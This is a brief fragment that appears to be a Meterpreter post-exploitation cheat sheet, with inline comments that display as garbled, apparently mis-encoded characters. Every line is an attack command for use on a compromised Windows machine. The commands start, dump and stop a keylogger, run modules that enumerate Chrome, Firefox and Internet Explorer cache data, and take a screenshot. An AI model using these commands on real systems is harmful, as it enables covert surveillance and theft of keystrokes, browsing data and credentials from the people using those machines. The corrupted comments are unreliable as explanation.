keyscan_start //¿ªÆô¼üÅ̼Ǽ¹¦ÄÜ
keyscan_dump //ÏÔʾ²¶×½µ½µÄ¼üÅ̼ǼÐÅÏ¢
keyscan_stop //Í£Ö¹¼üÅ̼Ǽ¹¦ÄÜ
run post/windows/gather/enum_chrome //»ñÈ¡¹È¸è»º´æ
run post/windows/gather/enum_firefox //»ñÈ¡»ðºü»º´æ
run post/windows/gather/enum_ie //»ñÈ¡IE»º´æ
screenshot //½ØÆÁ |
|